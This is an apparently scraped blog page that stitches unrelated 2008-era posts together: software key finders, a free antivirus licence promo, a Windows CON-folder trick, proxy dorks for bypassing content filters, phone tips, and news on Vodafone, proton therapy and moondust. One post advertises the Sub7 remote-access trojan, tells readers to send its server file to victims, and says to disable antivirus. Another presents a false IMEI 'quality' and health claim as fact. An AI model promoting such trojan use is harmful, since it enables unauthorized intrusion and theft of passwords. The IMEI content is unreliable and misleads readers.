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Serial Numbers Revealer
It also saves your money and time, free and easy to use.
If you lost your CD-Key or Serials of purchased softwares, you can do these:
1: You can buy a license again.
2: You can buy a product key finder program.
3: Or you can use free SoftKey Revealer.
Features:
- Displays over 700 software products
- Save to Text or Word (Word XP/2003/2007 only)
- Displays for 64bit-Edition releases
Notes : Some Microsoft products not included.
Games not included (you can use Game Key Revealer).
Supported Operating Systems:
Windows 98/ME/XP/2003/Vista
Note: Maybe works on Windows 95/2000/NT, we didn't tested on them.
If you tested SoftKey Revealer on above OS, please tell us.
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Order Free Ubuntu CD To Ur Doorstep!
Ubuntu is available free of charge and they can send you a CD of the latest version (8.04 LTS (Hardy Heron)) with no extra cost, but the delivery may take up to ten weeks. U just have to Register there thts all :wave
Link:
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Get 100 Days Free Kaspersky Internet Security 2009 License Key
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Now visit this special Computer Shopper promotional page.
Enter the asked details (you can enter fake information and disposable email address if you have privacy concerns), and submit the form.
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Top 10 Entrecard droppers Sep 2008 link love
Here are top 10 Entrecard droppers of September with their links (dofollow value from my PR5 blog ). From the bottom of my heart, I would like to thank you all for visiting and supporting my blog.
Keep dropping! See ya next month
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How To Create Con folder
span style="color: rgb(255, 255, 255); font-size: 85%;">CON is a reserve world in windows operating system.
that's why we can not create the folder named as
CON.
But by command prompt we can do this
STEP1: goto command prompt
STEP2: type in prompt e:\> "mkdir \\.\e:\con"
STEP3: verify by typing "dir \\.\e:\con"
STEP4: delete the file or folder "rmdir \\.\e:\con"
ollowing file names in Windows are reserved because they represent devices:
con, con.* -> the console
prn, prn.* -> the default printer, as a character device
aux, aux.* -> the default serial terminal, as a character device
lpt1, lpt2, lpt3, lpt4, lpt5, lpt6, lpt7, lpt8, lpt9 -> the parallel ports, as character devices
lpt1.*, lpt2.*, lpt3.*, lpt4.*, lpt5.*, lpt6.*, lpt7.*, lpt8.*, lpt9.*
com1, com2, com3, com4, com5, com6, com7, com8, com9 -> the serial ports, as character devices
com1.*, com2.*, com3.*, com4.*, com5.*, com6.*, com7.*, com8.*, com9.*
nul, nul.* -> the NUL or "waste bit bucket" or "black hole for bits" or "/dev/null" device
Such files are considered to "exist" in all directories, so if you have a filename like "c:\temp\con", you're talking about the CON device, not about a normal disk file called "con". They're not listed using the "dir" command, or using APIs.
HACK ANY PC,EMAILS,PASSWORDS WITH SUB7 ULTIMATE
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The new version of Sub7 the notorious RAT( Remote Administration Tool) 'Sub7 Ultimate'has just released. This is an upgraded version (new features included and minor bugs fixed) of the most stable version of sub7 'The sub7legends'. Download the full package (2 Mb),and follow the simple steps described in the detailed tutorial shipped with the package to create your own trojan and hack almost everything with it.
IMPORTANT NOTICE:
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Do not double click or open the file 'server.exe'which is located in your sub7 installed folder.That file is meant to send to your victims. So if you opened it, it will infect your own system.
Sub7 is a black listed RAT which is notorious for its wide and illegal usage for breaking into unauthorized computers. So your AntiVirus mite prevent or currupt the sub7 files at site. Disable your Antivirus before you downloading Sub7.
For more informations google 'sub7'.
download link is:www.mediamax.com/helpsoft/Hosted/Sub
change the last part of the link Sub7Setup.z_ip to Sub7Setup.zip
China mobile PC suite (100% popular)
the link is
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Web Proxy For privacy
You’re connecting to a public network at a coffee shop or internet cafĂ© and you want privacy while you browse the web. You don’t want the admin to know every site you visit.
You want to bypass a web content filter or perhaps a server-side ban on your IP address. Content filtering is common practice on college campus networks. This trick will usually bypass those restrictions.
There are subscription services and applications available such as TOR and paid VPN servers that do the same thing. However, this trick is free and easy to access from anywhere via Google. All you have to do is look through the search results returned by the queries below, find a proxy that works, and enter in the URL of the site you want to browse anonymously.
Examples:
inurl:”nph-proxy.cgi” “start using cgiproxy” inurl:”nph-proxy.cgi” “Start browsing through this CGI-based proxy” More info.
Check Your Mobile Quality as per below
Type *#06# and press DIAL [green button]
After you enter the code you will see the IMEI code : 154526089564585 [sample number]
IF the Seventh & Eighth digit numbers are 02 or 20 that means it was assembled in Emirates, which is very Bad quality.
IF the Seventh & Eighth digit numbers are 08 or 80 that means it’s manufactured in Germany which is not bad
IF the Seventh & Eighth digit numbers are 01 or 10 that means it’s manufactured in Finland which is Good
IF the Seventh & Eighth digit numbers are 00 that means it wasmanufactured in original factory which is the best Mobile Quality
…IF the Seventh & Eighth digit numbers are 13 that means it wasAssembly on Azerbaijan which is very Bad quality and very dangerous forhealth!!!
Hide Your private Files Using File Hide
Since your mobile phone is your personal device and there is every possibility you having your personal stuff in the phone which you not like to share and there is nothing better than having an application by means of which you can prevent anyone from seeing your private files etc.
File hide features:
1. Download file hide on your phone and when you run it for the first time it prompts you to set a password. Then just set the password and restart file hide to start using it.
2. To change the set password what you need to do is enter the current password and then enter the new password.
3. When you launch file hide it asks for the password you set earlier each time, so that no one other than you can use the software.
4. To protect your files you can click on the hide feature in the option menu and the file will then not be listed in the phone and can be seen only through file hide.
5. The better way to hide a file is to uncheck the option which shows the status of the file which means that it will show the file in the phone but you no one can’t open the file without password. If you uncheck the option it will completely hide the file rather than showing a password protected file
Another good thing about File hide is that it is available for free and it is quite fast and easy to use.
you cannot see the hidden files in the phone but when you access the memory card from your computer, the hidden files become visible
Download here: http://www.getjar.com/products/15083/FileHide
Turn your mobile camera into webcam
I have a solution
If you have a s60 nokia phone with camera you can use it like your webcam
The smart cam application connect the PC to your mobile and it will syncronize your mobile with pc so u can use your mobile camera as a webcam and have a video conferencing.
Basic features
Basic outline features of Smart Cam:
1. Smart Cam is basically developed for the Symbian series 60 phones with Bluetooth connectivity using which the integration of your phone cam with your pc is made easy.
2. What you need to get started is, just install Smart Cam in your pc and in your phone also. You need to have the application installed in both the terminals.
3. Connect the phone to pc via Bluetooth using the Smart Cam application interface.
4. Once you have connected to the pc what you need to do is to synchronize the phone with your pc so that you can easily make it function as your pc webcam.
5.Smart Cam works very well with Skype and yahoo messenger where you can video chat with your friends using your phone’s cam.
Download Smart cam Click the link: from here
Problem Solution Nokia N95
Problem :
no tools for application settings, infrared and radio tools. USB were not detected by the computer.
Solution :
The N95 works after all. Just download mt6227 usb driver from the internet and also pc sync. For the COM port, try different COM ports through the nokia pc suite and at least one of them will work.
Problem :
My chinese clone of N95 is continuously restarting with SIM and its bluetooth is also not working,tried restore factory settings but of no use.Any suggestions??
Solution :
Hi for drivers and PC Sync Suite go to http://www.chinamanuals.com
Problem :
i want free MT 6227 drivers whre i can find it
Solution :
Test if your new device needs settings for sending multimedia messages (MMS) and browsing the Internet.
Please verify with your operator or service provider that MMS and/or browsing are included in your service package.
Step 1: Test to see if your device needs MMS settings
Step 2: Test to see if your device needs mobile browsing settingsPress the zero key of your Nokia device for three seconds. If your device connects to your operator site or any other home page, you have the settings. You don’t need to download settings - just start browsing and messaging!
BUt if you still receive an error message,
Step 3: Download settings
**If you have gone through steps 1-2 and check failed, order settings for your device.
Browsing & MMS settings
1. Includes settings for:
2. Multimedia messaging (MMS settings)
3. Mobile browsing (WAP/GPRS settings)
4. Internet access point (Internet settings)
Download standard settings @:
https://nokiags.wdsglobal.com/standard?siteLanguageId=118
For Email, streaming and more
For your selected phones and more advanced users, includes settings for:
1. Streaming
2. Push to talk
3. Email
4. Over-the-air updates of Nokia software (firmware)
Download advanced settings @:
https://nokiags.wdsglobal.com/advanced?siteLanguageId=118
Vodafone appoints new enterprise director
New Vodafone UK enterprise director Nortel's Peter Kelly will report to UK chief executive Nick Read and sit on the UK board. Kelly has spent the last 17 years at Nortel and most recently as president of enterprise for the EMEA region. He has extensive experience in sales, marketing and strategic management.
Nortel's Peter Kelly said that- "Vodafone UK is a rapidly evolving, world-class business with all the credentials to lead in the 'total communications' space. I'm delighted to be joining the organisation at such a dynamic time. It's an exciting place to be and I relish the challenges ahead of me."
Acting enterprise director Mark Bond will support Kelly to ensure a successful transition over the next weeks, and will remain a member of the senior leadership team.
Bates researchers eye proton therapy for cancer
Researchers at MIT's Bates Linear Accelerator Center have begun a collaboration with Texas-based ProTom International to develop and test a new cancer treatment based on proton therapy.The fundamental idea is to harness the cell-killing power of protons -- the nuclei of hydrogen atoms -- to knock off cancer cells before the cells kill the patient. Protons are useful especially in cases where it is important to minimize damage to the surrounding healthy tissue. ProTom holds the exclusive U.S. rights for one such proton therapy system initially developed in Russia. The MIT-ProTom team aims to apply their results at ProTom cancer treatment centers beginning in 2010.
"We at Bates are excited to participate in a collaboration to improve proton beam therapy with the objective of more effective cancer treatment worldwide," said Robert Redwine, director of Bates and a professor of physics at MIT. The work will be performed under Redwine's direction. Bates is a part of MIT's Laboratory for Nuclear Science.
Courtesy of NASA
Using Laser Beams And Electric Fields, NASA Researchers Probe Curious Behavior Of Moondust
ScienceDaily (Nov. 28, 2005) — Each morning, Mian Abbas enters his laboratory and sits down to examine--a single mote of dust. Zen-like, he studies the same speck suspended inside a basketball-sized vacuum chamber for as long as 10 to 12 days.
The microscopic object of his rapt attention is not just any old dust particle. It's moondust. One by one, Abbas is measuring properties of individual dust grains returned by Apollo 17 astronauts in 1972 and the Russian Luna-24 sample-return spacecraft that landed on the Moon in 1976.
"Experiments on single grains are helping us understand some of the strange and complex properties of moondust," says Abbas. This knowledge is important. According to NASA's Vision for Space Exploration, astronauts will be back on the moon by 2018--and they'll have to deal with lots of moondust.
The dozen Apollo astronauts who walked on the moon between 1969 and 1972 were all surprised by how "sticky" moondust was. Dust got on everything, fouling tools and spacesuits. Equipment blackened by dust absorbed sunlight and tended to overheat. It was a real problem.
Many researchers believe that moondust has a severe case of static cling: it's electrically charged. In the lunar daytime, intense ultraviolet (UV) light from the sun knocks electrons out of the powdery grit. Dust grains on the moon's daylit surface thus become positively charged.
Eventually, the repulsive charges become so strong that grains are launched off the surface "like cannonballs," says Abbas, arcing kilometers above the moon until gravity makes them fall back again to the ground. The moon may have a virtual atmosphere of this flying dust, sticking to astronauts from above and below.
Or so the theory goes.
But do grains of lunar dust truly become positively charged when illuminated by ultraviolet light? If so, which grains are most affected--big grains or little grains? And what does moondust do when it's charged?
These are questions Abbas is investigating in his "Dusty Plasma Laboratory" at the National Space Science and Technology Center in Huntsville, Alabama. Along with colleagues Paul Craven and doctoral student Dragana Tankosic, Abbas injects a single grain of lunar dust into a chamber and "catches" it using electric force fields. (The injector gives the grain a slight charge, allowing it to be handled by electric fields.) With the grain held suspended literally in mid-air, they "pump the chamber down to 10-5 torr to simulate lunar vacuum."
Next comes the mesmerizing part: Abbas shines a UV laser on the grain. As expected, the dust gets "charged up" and it starts to move. By adjusting the chamber's electric fields with painstaking care, Abbas can keep the grain centered; he can measure its changing charge and explore its fascinating characteristics.
Like the Apollo astronauts, Abbas has already discovered some surprises--even though his experiment is not yet half done.
"We've found two things," says Abbas. "First, ultraviolet light charges moondust 10 times more than theory predicts. Second, bigger grains (1 to 2 micrometers across) charge up more than smaller grains (0.5 micrometer), just the opposite of what theory predicts."
Clearly, there's much to learn. For instance, what happens at night, when the sun sets and the UV light goes away?
That's the second half of Abbas's experiment, which he hopes to run in early 2006. Instead of shining a UV laser onto an individual lunar particle, he plans to bombard dust with a beam of electrons from an electron gun. Why electrons? Theory predicts that lunar dust may acquire negative charge at night, because it is bombarded by free electrons in the solar wind--that is, particles streaming from the sun that curve around behind the moon and hit the night-dark soil.
When Apollo astronauts visited the Moon 30+ years ago, they landed in daylight and departed before sunset. They never stayed the night, so what happened to moondust after dark didn't matter. This will change: The next generation of explorers will remain much longer than Apollo astronauts did, eventually setting up a permanant outpost. They'll need to know, how does moondust behave around the clock?
Moon Gets A Lashing From Earth's Magnetotail
Behold the full moon. Ancient craters and frozen lava seas lie motionless under an airless sky of profound quiet. It’s a serene, slow-motion world where even a human footprint may last millions of years. Nothing ever seems to happen there, right?
Wrong.
NASA-supported scientists have realized that something happens every month when the moon gets a lashing from Earth’s magnetic tail.
“Earth’s magnetotail extends well beyond the orbit of the moon and, once a month, the moon orbits through it,” says Tim Stubbs, a University of Maryland scientist working at the Goddard Space Flight Center. “This can have consequences ranging from lunar ‘dust storms’ to electrostatic discharges.”
Yes, Earth does have a magnetic tail. It is an extension of the same familiar magnetic field we experience when using a Boy Scout compass to find our way around Earth’s surface. Our entire planet is enveloped in a bubble of magnetism, which springs from a molten dynamo in Earth’s core. Out in space, the solar wind presses against this bubble and stretches it, creating a long “magnetotail” in the downwind direction.
Anyone can tell when the moon is inside the magnetotail. Just look: “If the moon is full, it is inside the magnetotail,” says Stubbs. “The moon enters the magnetotail three days before it is full and takes about six days to cross and exit on the other side.”
It is during those six days that strange things can happen.
During the crossing, the moon comes in contact with a gigantic “plasma sheet” of hot charged particles trapped in the tail. The lightest and most mobile of these particles, electrons, pepper the moon’s surface and give the moon a negative charge.
On the moon’s dayside this effect is counteracted to a degree by sunlight: UV photons knock electrons back off the surface, keeping the build-up of charge at relatively low levels. But on the nightside, in the cold lunar dark, electrons accumulate and surface voltages can climb to hundreds or thousands of volts.
Imagine what it feels like to be a sock pulled crackling from a dryer. Astronauts on the moon during a magnetotail crossing might be able to tell you. Walking across the dusty charged-up lunar terrain, the astronauts themselves would gather a load of excess charge. Touching another astronaut, a doorknob, a piece of sensitive electronics -- any of these simple actions could produce an unwelcome discharge. “Proper grounding is strongly recommended,” says Stubbs.
The ground, meanwhile, might leap into the sky. There’s growing evidence that fine particles of moondust might actually float, ejected from the lunar surface by electrostatic repulsion. This could create a temporary nighttime atmosphere of dust ready to blacken spacesuits, clog machinery, scratch faceplates (moondust is very abrasive) and generally make life difficult for astronauts.
Stranger still, moondust might gather itself into a sort of diaphanous wind. Drawn by differences in global charge accumulation, floating dust would naturally fly from the strongly-negative nightside to the weakly-negative dayside. This “dust storm” effect would be strongest at the moon’s terminator, the dividing line between day and night.
Much of this is pure speculation, Stubbs cautions. No one can say for sure what happens on the moon when the magnetotail hits, because no one has been there at the crucial time. “Apollo astronauts never landed on a full moon and they never experienced the magnetotail.”
The best direct evidence comes from NASA’s Lunar Prospector spacecraft, which orbited the moon in 1998-99 and monitored many magnetotail crossings. During some crossings, the spacecraft sensed big changes in the lunar nightside voltage, jumping “typically from -200 V to -1000 V,” says Jasper Halekas of UC Berkeley who has been studying the decade-old data.
“It is important to note,” says Halekas, “that the plasma sheet (where all the electrons come from) is a very dynamic structure. The plasma sheet is in a constant state of motion, flapping up and down all the time. So as the moon orbits through the magnetotail, the plasma sheet can sweep across it many times. Depending on how dynamic things are, we can encounter the plasma sheet many times during a single pass through the magnetotail with encounters lasting anywhere from minutes to hours or even days.”
“As a result, you can imagine how dynamic the charging environment on the moon is. The moon can be just sitting there in a quiet region of the magnetotail and then suddenly all this hot plasma goes sweeping by causing the nightside potential to spike to a kilovolt. Then it drops back again just as quickly.”
The roller coaster of charge would be at its most dizzying during solar and geomagnetic storms. “That is a very dynamic time for the plasma sheet and we need to study what happens then,” he says.
What happens then? Next-generation astronauts are going to find out. NASA is returning to the moon in the decades ahead and plans to establish an outpost for long-term lunar exploration. It turns out they’ll be exploring the magnetotail, too.